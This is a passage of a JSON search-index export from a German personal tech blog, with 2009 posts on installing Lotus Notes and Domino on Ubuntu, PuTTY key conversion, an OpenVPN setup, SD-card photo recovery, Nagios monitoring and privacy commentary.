:-)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDie grafische Oberfläche von Notes ist teilweise nicht sichtbar,\nFensterinhalte sind komplett leer … Die Lösung ? Eigentlich ganz\neinfach. Es müssen nur ein paar libs ausgetauscht werden.[…] [den ganzen\nArtikel und die Libs auf Linux\nAHA]\u003ca href=\"http://linux-aha.de/wordpress/?p=231\" target=\"_blank\"\u003e1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eDanke schön für die Libs! Die funktionieren auch mit Lotus Notes 8.5.1\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-10-16-lotus-notes-8-5-1-auf-ubuntu-9-10-karmic/","title":"Lotus Notes 8.5.1 auf Ubuntu 9.10 (Karmic)"},{"body":"Laut dem Dominoblog wird DAOS in der Version 8.5.1 eine Funktion enthalten, die auch die Netzwerklast minimiert.\nIn\nDomino 8.5.1, DAOS is now enhanced so that it can EXTEND its optimization\nbetween clients and servers, and among servers!! This is intra-server\ncopying!\nDomino Blog: DAOS Updates for Domino 8.5.1 Das heißt Dateianhänge werden zwischen den Dominoservern auch nur noch einmal ausgetauscht und sparen damit effektiv Netzwerkbandbreite.\nWenn das ähnlich gut funktioniert wie DAOS bisher, ist das wirklich ein cooles Feature.\n","excerpt":"\u003cp\u003eLaut dem Dominoblog wird DAOS in der Version 8.5.1 eine Funktion\nenthalten, die auch die Netzwerklast minimiert.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eIn\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDomino 8.5.1, DAOS is now enhanced so that it can EXTEND its\noptimization\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003ebetween clients and servers, and among servers!!  This is intra-server\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003ecopying!\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.dominoblog.com/dominoblog/dblog.nsf/dx/daos-updates-for-domino-8.5.1\" target=\"_blank\"\u003eDomino\nBlog: DAOS Updates for Domino 8.5.1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eDas heißt Dateianhänge werden zwischen den Dominoservern auch nur noch\neinmal ausgetauscht und sparen damit effektiv Netzwerkbandbreite.\u003c/p\u003e\n\u003cp\u003eWenn das ähnlich gut funktioniert wie DAOS bisher, ist das wirklich ein\ncooles Feature.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-09-23-neues-daos-feature-in-8-5-1/","title":"Neues DAOS Feature in 8.5.1"},{"body":"Ubuntu 9.04 habe ich als Grundsystem inklusive SSH-Server installiert.\nFolgende Pakete sollten zusätzlich installiert werden:\n\u0026lt;br /\u0026gt; sudo aptitude install libstdc++5 libxmu6 libxp6 libxp-java libxtst6 build-essential\u0026lt;br /\u0026gt;\nUnter Ubuntu ist /bin/sh mit dash verlinkt, damit erhält man beim Ausführen des Installers eine Fehlermeldung. Daher sollte man /bin/sh mit /bin/bash verlinken:\n\u0026lt;br /\u0026gt; rm /bin/sh\u0026lt;br /\u0026gt; ln -s /bin/bash /bin/sh\u0026lt;br /\u0026gt;\nDanach läuft das Installationsprogramm wie gewohnt durch, es erscheint aber eine Fehlermeldung, dass das System nicht supported wird.\nAuf manchen Systemen war es notwendig mit sudo su in den root-Account zu wechseln und erst dann den Installer mit ./install aufzurufen.\n","excerpt":"\u003cp\u003eUbuntu 9.04 habe ich als Grundsystem inklusive SSH-Server installiert.\u003c/p\u003e\n\u003cp\u003eFolgende Pakete sollten zusätzlich installiert werden:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; sudo aptitude install libstdc++5 libxmu6 libxp6 libxp-java libxtst6 build-essential\u0026lt;br /\u0026gt;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eUnter Ubuntu ist /bin/sh mit dash verlinkt, damit erhält man beim\nAusführen des Installers eine Fehlermeldung. Daher sollte man /bin/sh\nmit /bin/bash verlinken:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; rm /bin/sh\u0026lt;br /\u0026gt; ln -s /bin/bash /bin/sh\u0026lt;br /\u0026gt;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eDanach läuft das Installationsprogramm wie gewohnt durch, es erscheint\naber eine Fehlermeldung, dass das System nicht supported wird.\u003c/p\u003e\n\u003cp\u003eAuf manchen Systemen war es notwendig mit \u003ccode\u003esudo su\u003c/code\u003e in den root-Account\nzu wechseln und erst dann den Installer mit \u003ccode\u003e./install\u003c/code\u003e aufzurufen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-08-13-domino-8-5-installation-auf-ubuntu-9-04-server/","title":"Domino 8.5 Installation auf Ubuntu 9.04 Server"},{"body":"Nach meinem kompletten Umstieg auf Linux fand ich u.a. noch eine ppk-Datei die ich ssh-Verbindungen benutze.\nDa ich unter Ubuntu nicht mehr mit putty arbeiten wollte, suchte ich nach einer Möglichkeit, diesen Key in einen RSA-Key umzuwandeln.\napt-get install puttygen\nputtygen key.ppk -o id_rsa.pub -O public-openssh\nputtygen key.ppk -o id_rsa -O private-openssh\nWeitere Infos in der puttygen Manpage ","excerpt":"\u003cp\u003eNach meinem kompletten Umstieg auf Linux fand ich u.a. noch eine\nppk-Datei die ich ssh-Verbindungen benutze.\u003c/p\u003e\n\u003cp\u003eDa ich unter Ubuntu nicht mehr mit putty arbeiten wollte, suchte ich\nnach einer Möglichkeit, diesen Key in einen RSA-Key umzuwandeln.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eapt-get install puttygen\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eputtygen key.ppk -o id_rsa.pub -O public-openssh\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eputtygen key.ppk -o id_rsa -O private-openssh\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eWeitere Infos in der\n\u003ca href=\"http://manpages.ubuntu.com/manpages/intrepid/man1/puttygen.1.html\" target=\"_blank\"\u003eputtygen\nManpage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-07-29-putty-keyfile-ppk-in-rsa-key-umwandeln/","title":"Putty-Keyfile (\\*.ppk) in rsa-key umwandeln"},{"body":"Endlich hab ich es geschafft. Mit kräftiger Hilfe von einigen Twitternutzern, ist es mir gelungen mit Openvpn eine VPN-Verbindung zu unserer Watchguard aufzubauen.\nAls erstes sollte man sich die Datei client.wgssl von der jeweiligen Firebox besorgen. Diese Datei kann man am Einfachsten direkt von der Firewall herunterladen:\nhttps://gateway:4100/?action=sslvpn_download\u0026amp;filename=client.wgssl\u0026amp;usern\u0026lt;br /\u0026gt; ame=my_name\u0026amp;password=my_password\nDie Datei umbenennen in client.wgssl.tgz und schon kann man sie mit\ntar -xvzf client.wgssl.tgz entpacken. Man sollte folgende Dateien erhalten:\nca.crt\nclient.crt\nclient.pem\nclient.ovpn\nVERSION\nMD5SUM\nIch habe diese Files nach /etc/openvpn verschoben, da es mir erst nicht gelungen ist, als User die VPN Verbindung aufzubauen. Um die DNS-Einstellungen vom VPN zu erhalten, muß man die Datei client.ovpn anpassen. Ich habe folgende Einträge hinzugefügt:\nscript-security 2\u0026lt;br /\u0026gt; up /etc/openvpn/update-resolv-conf\u0026lt;br /\u0026gt; down /etc/openvpn/update-resolv-conf\nAußerdem sollte man das Paket resolvconf nachinstallieren.\nsudo apt-get install resolvconf\nDen Tunnel baut man dann mit:\ncd /etc/openvpn\u0026lt;br /\u0026gt; sudo openvpn ./client.ovpn\nauf.\nProblematisch ist noch das Beenden des Tunnels, da mit Strg-C zwar der Tunnel weg ist, aber die alten DNS-Einstellungen nicht zurückgestellt werden.\nNetworkmanager sudo apt-get install network-manager-openvpn\nDie Einstellungen kann man z.B. aus dem client.ovpn importieren. Manche Einstellungen sollte man dann noch etwas anpassen. Bei mir funktionierte die Verbindung erst richtig, als ich die Option “Use this connection only for resources on its network” (unter Routes) aktiviert hatte.\n","excerpt":"\u003cp\u003eEndlich hab ich es geschafft. Mit kräftiger Hilfe von einigen\nTwitternutzern, ist es mir gelungen mit Openvpn eine VPN-Verbindung zu\nunserer Watchguard aufzubauen.\u003c/p\u003e\n\u003cp\u003eAls erstes sollte man sich die Datei client.wgssl von der jeweiligen\nFirebox besorgen. Diese Datei kann man am Einfachsten direkt von der\nFirewall herunterladen:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003ehttps://gateway:4100/?action=sslvpn_download\u0026amp;filename=client.wgssl\u0026amp;usern\u0026lt;br /\u0026gt; ame=my_name\u0026amp;password=my_password\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eDie Datei umbenennen in client.wgssl.tgz und schon kann man sie mit\u003cbr\u003e\n\u003ccode\u003etar -xvzf client.wgssl.tgz\u003c/code\u003e entpacken. Man sollte folgende Dateien\nerhalten:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eca.crt\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eclient.crt\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eclient.pem\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eclient.ovpn\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eVERSION\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMD5SUM\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIch habe diese Files nach /etc/openvpn verschoben, da es mir erst nicht\ngelungen ist, als User die VPN Verbindung aufzubauen. Um die\nDNS-Einstellungen vom VPN zu erhalten, muß man die Datei client.ovpn\nanpassen. Ich habe folgende Einträge hinzugefügt:\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-07-08-ssl-vpn-von-ubuntu-zu-watchguard-firebox/","title":"SSL VPN von Ubuntu zu Watchguard Firebox"},{"body":"Aus aktuellem Anlass eine kurze Anleitung zum Retten von Fotos von SD Karten, die unter Windows nicht mehr erkannt werden (Platte muß formatiert werden usw.).\nNotwendige Pakete installieren sudo apt-get install testdisk ddrescue\nPartition identifizieren Beim Einstecken der Karte in das Lesegerät, kommt im Log normalerweise der Eintrag, welches Device erstellt wurde.\nÖffnet ein Terminalfenster und startet mit tail -f /var/log/messages die Ausgabe des Logs.\nIch gehe jetzt mal von /dev/sr aus.\nsudo fdisk -l /dev/sr zeigt uns, welche Partitionen auf der Karte vorhanden sind.\nImage erstellen Um nicht evtl. Daten auf der Karte zu zerstören, arbeiten wir mit einen Image. ddrescue /dev/sr1 /home/\u0026lt;user\u0026gt;/disk.img\nFotos extrahieren mkdir /home/\u0026lt;user\u0026gt;/foto_rescue\nphotorec /d /home/\u0026lt;user\u0026gt;/foto_rescue /home/\u0026lt;user\u0026gt;/disk.img\nFotos die das Programm retten konnte landen damit in /home//foto_rescue\nDa bleibt mir nur noch eines: VIEL GLÜCK!!!\n","excerpt":"\u003cp\u003eAus aktuellem Anlass eine kurze Anleitung zum Retten von Fotos von SD\nKarten, die unter Windows nicht mehr erkannt werden (Platte muß\nformatiert werden usw.).\u003c/p\u003e\n\u003ch1 id=\"notwendige-pakete-installieren\"\u003eNotwendige Pakete installieren \u003ca href=\"#notwendige-pakete-installieren\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003ccode\u003esudo apt-get install testdisk ddrescue\u003c/code\u003e\u003c/p\u003e\n\u003ch1 id=\"partition-identifizieren\"\u003ePartition identifizieren \u003ca href=\"#partition-identifizieren\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eBeim Einstecken der Karte in das Lesegerät, kommt im Log normalerweise\nder Eintrag, welches Device erstellt wurde.\u003c/p\u003e\n\u003cp\u003eÖffnet ein Terminalfenster und startet mit \u003ccode\u003etail -f /var/log/messages\u003c/code\u003e\ndie Ausgabe des Logs.\u003c/p\u003e\n\u003cp\u003eIch gehe jetzt mal von /dev/sr aus.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003esudo fdisk -l /dev/sr\u003c/code\u003e zeigt uns, welche Partitionen auf der Karte\nvorhanden sind.\u003c/p\u003e\n\u003ch1 id=\"image-erstellen\"\u003eImage erstellen \u003ca href=\"#image-erstellen\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eUm nicht evtl. Daten auf der Karte zu zerstören, arbeiten wir mit einen\nImage. \u003ccode\u003eddrescue /dev/sr1 /home/\u0026lt;user\u0026gt;/disk.img\u003c/code\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-07-04-fotos-von-sd-karte-retten-mit-ubuntu/","title":"Fotos von SD Karte retten (mit Ubuntu)"},{"body":"Im Moment hab ich wieder ziemlich viel um die Ohren und nutze nur ein wenig meinen Twitter-Account , um Neues von mir zu verbreiten.\nMeine nächsten Termine sind am 14. Juli 09 ein Vortrag im KuKO in Rosenheim über Nagios und Monitoring. Vortrag wird im Rahmen einer NetIT Region Veranstaltung stattfinden.\nAußerdem halte ich am AdminCamp 2009 einen weiteren Vortrag zu Nagios und Monitoring von Lotus Domino.\nIch hoffe ich komme die nächsten Tage mal dazu, die Installation von http://www.icinga.orgIcinga zu testen. Das Demo auf der Homepage verspricht so Einiges. Ich bin gespannt, ob die Entwickler des Fork, wie versprochen Nagioskompatibel bleibt.\nAnsonsten installiere ich grade mit Otto einen Websphere Application Server mit Portal auf SLES 10. Wenn die Installation beendet ist, dann würde ich gerne das Nagiosplugin nagios-was testen.\n","excerpt":"\u003cp\u003eIm Moment hab ich wieder ziemlich viel um die Ohren und nutze nur ein\nwenig meinen \u003ca href=\"http://twitter.com/stoeps/\" target=\"_blank\"\u003eTwitter-Account \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, um Neues von\nmir zu verbreiten.\u003c/p\u003e\n\u003cp\u003eMeine nächsten Termine sind am 14. Juli 09 ein Vortrag im\n\u003ca href=\"http://www.kuko.de\" target=\"_blank\"\u003eKuKO \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Rosenheim über \u003ca href=\"http://www.nagios.org\" target=\"_blank\"\u003eNagios \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nund Monitoring. Vortrag wird im Rahmen einer\n\u003ca href=\"http://www.netit-region.eu\" target=\"_blank\"\u003eNetIT Region \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Veranstaltung stattfinden.\u003c/p\u003e\n\u003cp\u003eAußerdem halte ich am \u003ca href=\"http://www.Admincamp.de\" target=\"_blank\"\u003eAdminCamp 2009 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n einen\nweiteren Vortrag zu Nagios und Monitoring von Lotus Domino.\u003c/p\u003e\n\u003cp\u003eIch hoffe ich komme die nächsten Tage mal dazu, die Installation von\n\u003ca href=\"http://www.icinga.orgIcinga\" target=\"_blank\"\u003ehttp://www.icinga.orgIcinga \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zu testen. Das Demo auf der Homepage\nverspricht so Einiges. Ich bin gespannt, ob die Entwickler des Fork, wie\nversprochen Nagioskompatibel bleibt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-06-25-neues-und-termine/","title":"Neues und Termine"},{"body":"Ich habe schon öfter gelesen, daß man nach der Installation des eclipsebasierten Notesclients (Standard Client) den Ordner defragmentieren soll. Mir war nur nie klar, wie.\nIch hab jetzt contig von Sysinternals (inzwischen Microsoft) probiert und das funktioniert sehr gut. Mein Aufruf war contig -s c: und nach wenigen Minuten, war der Vorgang beendet. Der Notesclient öffnet tatsächlich um einiges performanter.\n","excerpt":"\u003cp\u003eIch habe schon öfter gelesen, daß man nach der Installation des\neclipsebasierten Notesclients (Standard Client) den Ordner\ndefragmentieren soll. Mir war nur nie klar, wie.\u003c/p\u003e\n\u003cp\u003eIch hab jetzt\n\u003ca href=\"http://technet.microsoft.com/de-de/sysinternals/bb897428.aspx\" target=\"_blank\"\u003econtig \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nvon \u003ca href=\"http://technet.microsoft.com/de-de/sysinternals/\" target=\"_blank\"\u003eSysinternals \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\n(inzwischen Microsoft) probiert und das funktioniert sehr gut. Mein\nAufruf war contig -s c: und nach wenigen Minuten, war der Vorgang\nbeendet. Der Notesclient öffnet tatsächlich um einiges performanter.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-31-notes-ordner-defragmentieren/","title":"Notes Ordner defragmentieren"},{"body":"So, nachdem Google Adsense ab April interessenbezogene Werbung schalten möchte und dazu eine Anpassung in der Datenschutzbestimmung der Webseiten empfiehlt.\nGoogle verknüpft also noch stärker die Informationen die wir beim Surfen hinterlassen. Der Besuch einer bestimmten Kategorie von Seiten bringt dann verstärkt Werbung aus diesem Bereich. Es wird also nicht mehr zur Webseite passende, sondern zum User passende Werbung angezeigt.\n[…] Mithilfe der Arten von Webseiten, die Nutzer innerhalb des Google Content-Werbenetzwerks aufrufen, entwickeln wir Interessenkategorien. Beispiel: Falls ein Nutzer eine Reihe von Sportseiten besucht, wird er der Interessenkategorie “sportbegeistert” hinzugefügt. […]\nIch möchte nicht, daß die Leser meiner Seiten in diese Kategorien gepresst werden und steige daher aus Adsense aus. Hab eh nie was bekommen, aber ich glaube das ist wie Lotto spielen. Man hofft immer auf den großen Gewinn, ohne wirklich was dafür getan zu haben.\nWundert euch nicht über die [ad]-Tags in manchen Blogposts, das kommt von der Deaktivierung des Adsense-Plugins in WordPress, da ich nicht jeden Post wieder editieren möchte.\nMein neues Joomla-Projekt ist bereits Adsensefrei, ich weiß noch nicht, ob ich eine andere Werbeplattform benutze, oder die Seiten komplett werbefrei belassen werde. Jetzt nur noch das Wiki umstellen, dann bin ich das Zeug los.\n","excerpt":"\u003cp\u003eSo, nachdem Google Adsense ab April interessenbezogene Werbung schalten\nmöchte und dazu eine Anpassung in der Datenschutzbestimmung der\nWebseiten empfiehlt.\u003c/p\u003e\n\u003cp\u003eGoogle verknüpft also noch stärker die Informationen die wir beim Surfen\nhinterlassen. Der Besuch einer bestimmten Kategorie von Seiten bringt\ndann verstärkt Werbung aus diesem Bereich. Es wird also nicht mehr zur\nWebseite passende, sondern zum User passende Werbung angezeigt.\u003c/p\u003e\n\u003cp\u003e[…] Mithilfe der Arten von Webseiten, die Nutzer innerhalb des Google\nContent-Werbenetzwerks aufrufen, entwickeln wir Interessenkategorien.\nBeispiel: Falls ein Nutzer eine Reihe von Sportseiten besucht, wird er\nder Interessenkategorie “sportbegeistert” hinzugefügt. […]\u003c/p\u003e\n\u003cp\u003eIch möchte nicht, daß die Leser meiner Seiten in diese Kategorien\ngepresst werden und steige daher aus Adsense aus. Hab eh nie was\nbekommen, aber ich glaube das ist wie Lotto spielen. Man hofft immer auf\nden großen Gewinn, ohne wirklich was dafür getan zu haben.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-13-adsense-nervt/","title":"Google Adsense nervt"},{"body":"Mich würde als weitere Notification-Methode eine Alarmierung über Jabber interessieren, daher habe ich heute Tests mit sendxmpp gemacht.\nInstalliert habe ich wie in der Anleitung im Nagios-Wiki beschrieben.\nDie Nachrichten habe ich als Absender vom jabber.ccc.de gesendet und Empfänger ist mein Googlemail -Benutzer. Die Nachrichten gehen raus, werden aber weder im Google-Chat-Client, noch in Adium oder Pidgin angezeigt. Nur in der Ansicht Chats im Googlemail sind die Nachrichten vorhanden.\nUnd es ist vollkommen egal, ob der jabber.ccc.de-Benutzer in einem IM-Client aktiv ist, oder nicht. Absender Googlemail kam gar nicht an, da kommt aber eine Fehlermeldung beim Versand.\nHat da jemand eine Idee?\n","excerpt":"\u003cp\u003eMich würde als weitere Notification-Methode eine Alarmierung über Jabber\ninteressieren, daher habe ich heute Tests mit sendxmpp gemacht.\u003c/p\u003e\n\u003cp\u003eInstalliert habe ich wie in der\n\u003ca href=\"http://www.nagios-wiki.de/nagios/howtos/sendxmpp\" target=\"_blank\"\u003eAnleitung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n im\n\u003ca href=\"http://www.nagios-wiki.de\" target=\"_blank\"\u003eNagios-Wiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n beschrieben.\u003c/p\u003e\n\u003cp\u003eDie Nachrichten habe ich als Absender vom\n\u003ca href=\"http://web.jabber.ccc.de/\" target=\"_blank\"\u003ejabber.ccc.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n gesendet und Empfänger ist mein\n\u003ca href=\"http://mail.google.com\" target=\"_blank\"\u003eGooglemail \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n-Benutzer. Die Nachrichten gehen raus,\nwerden aber weder im Google-Chat-Client, noch in Adium oder Pidgin\nangezeigt. Nur in der Ansicht Chats im Googlemail sind die Nachrichten\nvorhanden.\u003c/p\u003e\n\u003cp\u003eUnd es ist vollkommen egal, ob der jabber.ccc.de-Benutzer in einem\nIM-Client aktiv ist, oder nicht. Absender Googlemail kam gar nicht an,\nda kommt aber eine Fehlermeldung beim Versand.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-12-nagios-notifications-an-jabber-google-chat/","title":"Nagios Notifications an Jabber / Google-Chat"},{"body":"Habe gestern einen Artikel auf atnotes.de gelesen, dass Ulrich ein Phttp://www.eknori.de/2009-03-11/move-database-issue-in-nd85/[roblem mit dem verschiebenen eines Mailfiles auf einem Clustermember] hat.\nInteressanterweise hatte ich heute einen Support-Call, der den gleichen Fehler beschreibt. Auf dem Homeserver funktioniert das Verschieben, auf dem Cluster-Member nicht.\nIch teste noch bisschen und schreib dann noch paar Details. Werde morgen mal auf unserem Cluster einen Testuser verschieben, mal sehen, ob das funktioniert.\n","excerpt":"\u003cp\u003eHabe gestern einen Artikel auf atnotes.de gelesen, dass\n\u003ca href=\"http://www.eknori.de\" target=\"_blank\"\u003eUlrich \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ein\nPhttp://www.eknori.de/2009-03-11/move-database-issue-in-nd85/[roblem mit\ndem verschiebenen eines Mailfiles auf einem Clustermember] hat.\u003c/p\u003e\n\u003cp\u003eInteressanterweise hatte ich heute einen Support-Call, der den gleichen\nFehler beschreibt. Auf dem Homeserver funktioniert das Verschieben, auf\ndem Cluster-Member nicht.\u003c/p\u003e\n\u003cp\u003eIch teste noch bisschen und schreib dann noch paar Details. Werde morgen\nmal auf unserem Cluster einen Testuser verschieben, mal sehen, ob das\nfunktioniert.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-12-domino-move-database-with-adminp/","title":"Domino: Move Database with Adminp"},{"body":"Irgendwie komme ich im Moment nicht zum Bloggen. Mich interessieren so viele Dinge und ich beschäftige mich mit verschiedenen Projekten gleichzeitig.\nJoomla : Ich überlege, ob ich nicht WordPress aufgebe und zu Joomla wechsle, da habe ich dann doch mehr Möglichkeiten Artikel zu posten, die man auch sauber verlinken kann.\nIch bereite eine Nagios Presentation vor. Schwerpunkt wird das http://www.edcom.de/edcom/web/edcomcms.nsf/id/DE_Deep_in_the_Use_Monitoring_- laestiges_uebel_oder_sinnvolle_Prophylaxe_Netzwerkueberwachung_mit?open\u0026amp;l=DE\u0026amp;ccm=010008[Monitoring von Lotus Domino]. Hierzu nutze ich Ubuntu , SNMPTT und ein paar weitere Tools.\nIrgendwie hab ich SNMPTT mit den Anleitungen nicht zum Laufen gebracht. Das Init-Skript funktioniert überhaupt nicht. Auch nicht, wenn ich /etc/init.d/skeleton nach functions kopiere. Dann startet v.a. Nagios nicht mehr. Hab mir jetzt ein neues Init-Skript gebaut. Wenn es sauber läuft, gibt’s hier nen Download.\nNagios 3.0.6 finde ich super gelungen. Ich war mit den 2er Versionen schon begeistert, jetzt ist die Installation einfacher und einige kleine Verbesserungen überzeugen einfach.\nDas Wiki für das notestutorial gefällt mir schon lange nicht mehr. Ich bin mir noch nicht sicher, ob ich den Inhalt in Joomla integriere, oder ein anderes Wiki-System benutze. Dummerweise läuft mein Favorit Foswiki nicht auf meinem 1\u0026amp;1 Webspace.\nAußerdem beteilige ich mich in verschiedenen Foren, Web 2.0 Projekten und poste ab und zu auf Twitter. (www.twitter.com/stoeps )\nEs bleibt also spannend. :-)\n","excerpt":"\u003cp\u003eIrgendwie komme ich im Moment nicht zum Bloggen. Mich interessieren so\nviele Dinge und ich beschäftige mich mit verschiedenen Projekten\ngleichzeitig.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.joomla.org\" target=\"_blank\"\u003eJoomla \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n: Ich überlege, ob ich nicht\n\u003ca href=\"http://www.wordpress.org\" target=\"_blank\"\u003eWordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n aufgebe und zu Joomla wechsle, da\nhabe ich dann doch mehr Möglichkeiten Artikel zu posten, die man auch\nsauber verlinken kann.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIch bereite eine \u003ca href=\"http://www.nagios.org\" target=\"_blank\"\u003eNagios \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Presentation vor.\nSchwerpunkt wird das \u003ca href=\"http://www.edcom.de/edcom/web/edcomcms.nsf/id/DE_Deep_in_the_Use_Monitoring_-\" target=\"_blank\"\u003ehttp://www.edcom.de/edcom/web/edcomcms.nsf/id/DE_Deep_in_the_Use_Monitoring_- \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003cem\u003elaestiges_uebel_oder_sinnvolle_Prophylaxe_Netzwerkueberwachung_mit\u003c/em\u003e?open\u0026amp;l=DE\u0026amp;ccm=010008[Monitoring von Lotus Domino]. Hierzu nutze ich \u003ca href=\"http://www.ubuntu-linux.com\" target=\"_blank\"\u003eUbuntu \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, \u003ca href=\"http://www.snmptt.org\" target=\"_blank\"\u003eSNMPTT \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und ein paar weitere Tools.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eIrgendwie hab ich SNMPTT mit den \u003ca href=\"http://www.snmptt.org/docs/snmptt.shtml#Installation-Overview\" target=\"_blank\"\u003eAnleitungen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n nicht zum Laufen gebracht. Das Init-Skript funktioniert überhaupt nicht. Auch nicht, wenn ich /etc/init.d/skeleton nach functions kopiere. Dann startet v.a. Nagios nicht mehr. Hab mir jetzt ein neues Init-Skript gebaut. Wenn es sauber läuft, gibt’s hier nen Download.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-03-12-viel-zu-tun-2/","title":"Viel zu tun"},{"body":"Bei Notes 8.5 blockiert der notes.ini Parameter “UseBasicNotes=1” die Ausführung des Designers!\nvia Eknori – No Designer When Running in Basic Mode ","excerpt":"\u003cp\u003eBei Notes 8.5 blockiert der notes.ini Parameter “UseBasicNotes=1” die\nAusführung des Designers!\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://www.eknori.de/\" target=\"_blank\"\u003eEknori \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n –\n\u003ca href=\"http://www.eknori.de/2009-01-07/notes-85-no-designer-when-running-in-basic-mode/\" target=\"_blank\"\u003eNo\nDesigner When Running in Basic Mode \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-01-10-eknoride-no-designer-when-running-in-basic-mode/","title":"eknori.de: No Designer When Running in Basic Mode"},{"body":"Ich dachte eigentlich, daß die Briten nicht mehr viel tun können, um eine allumfassende Überwachung auf die Beine zu stellen. Aber die neueste Idee finde ich sehr bedenklich.\nOhne richterliche Anordnung soll es Polizei und Geheimdienst erlaubt sein, in Rechner einzudringen. Dies wird unter dem verniedlichendem Begriff “Remote Searching” auch von einem EU Council gedeckt.\n[…] The hacking is known as “remote searching”. It allows police or MI5 officers who may be hundreds of miles away to examine covertly the hard drive of someone’s PC at his home, office or hotel room. […]\nZitat aus: Times Online Hier wird wieder unter dem Deckmantel, daß eine EU-Richtlinie 